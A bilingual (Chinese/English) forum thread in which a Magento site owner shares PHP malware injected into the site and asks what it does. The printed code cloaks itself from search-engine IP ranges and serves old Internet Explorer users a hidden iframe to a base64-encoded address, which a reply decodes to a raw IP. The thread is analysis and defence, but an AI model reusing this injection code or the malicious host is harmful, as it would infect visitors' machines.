PHP Web 应用程序 (Magento) 遭到黑客攻击;这段黑客代码有什么作用?
我刚刚安装的 Magento 1.3.2.4 被黑了。你能告诉我这段代码的目的是什么吗?
另外,如何阻止这种情况以及如何发现漏洞?
谢谢
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}
$ip=$_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$user_agent = $_SERVER["HTTP_USER_AGENT"];
$IP = $_SERVER['REMOTE_ADDR'].".log";
@mkdir('/tmp/Location/');
$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');
if(!file_exists("/tmp/Location/{$IP}"))
{
if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)
{
if(strpos($user_agent, "Windows") !== false)
{
if (preg_match("/MSIE 6.0/", $user_agent) OR
preg_match("/MSIE 7.0/", $user_agent) OR
preg_match("/MSIE 8.0/", $user_agent)
)
{
echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';
touch ("/tmp/Location/{$IP}");
}}}}
I was just hacked on my Magento 1.3.2.4 installation. Can you tell me what is the purpose of this code?
Also, how to stop this and how to spot the vulnerability?
Thank you
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}
$ip=$_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$user_agent = $_SERVER["HTTP_USER_AGENT"];
$IP = $_SERVER['REMOTE_ADDR'].".log";
@mkdir('/tmp/Location/');
$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');
if(!file_exists("/tmp/Location/{$IP}"))
{
if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)
{
if(strpos($user_agent, "Windows") !== false)
{
if (preg_match("/MSIE 6.0/", $user_agent) OR
preg_match("/MSIE 7.0/", $user_agent) OR
preg_match("/MSIE 8.0/", $user_agent)
)
{
echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';
touch ("/tmp/Location/{$IP}");
}}}}
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(5)
它创建一个 iframe 将人们引导到另一个站点。 dfjgkbl变量包含URL的base64编码;如果您想知道它是什么,可以使用在线 Base64 解码器。我不会将其粘贴到此处,因为根据您的其余代码,该 URL 可能包含 Windows 病毒。
It creates an iframe that directs people to another site. The dfjgkbl variable contains the base64 encoding of the URL; there are online base64 decoders available if you wish to know what it is. I won't paste it here because the URL likely contains a Windows virus, based on the rest of your code.
只是一个友好的建议,如果您使用 FileZilla 作为 FTP 代理,它会将保存的密码保存在 xml 文件中,则您的电脑上可能存在病毒,可以将 FileZilla 连接到您的服务器并将其写入您的文件。另请检查您的 CPanel 并查找不是由您创建的 FTP 帐户。情况可能并非如此,无论如何,请检查一下。
Just a friendly advice, if you are using FileZilla as FTP agent it keeps the saved passwords in an xml file, there might be a virus on your pc that can connect to FileZilla to your server and write this to your files. Also check your CPanel and look for FTP accounts that are not created by you. This might not be the case, just check in any case.
我在 Total Commander 中也遇到了类似的问题...病毒使用 TC FTP 帐户并完全更改了我的网站 (Joomla CMS),并向几乎每个 php 文件添加了类似的恶意代码。
I also had similar problem with Total Commander... Virus used TC FTP account and completely changed my Website (Joomla CMS) and added similar malicious code to almost every php file.
转到:
请勿点击(这是黑客链接)>>>>> 129.121.38.102 / 主页/ 索引 。 php
黑客创建了您网站上所有内容的日志。
goes to:
DO NOT CLICK THAT (this is the HACKER LINK) >>>> 129.121.38.102 / Home/ index . php
The hacker creates a log of everything that goes on your website.
首先升级你的 Magento,此时它就像非常旧的版本。
您的被黑代码是我们每次都会看到的通用 php 病毒代码,它是一种自动病毒,从您的 PC 到服务器或从服务器到服务器,
您也可以使用免费插件,例如 magefirewall 来保护您的 magento。
PS 我是开发者之一
First upgrade your Magento it is like very old version at this point.
Your hacked code is a generic php virus code we see everytime, it is an automated virus that goes from your PC to server or from server-server
also you can use a free plugin like : magefirewall to protect your magento.
P.S Im one of the developers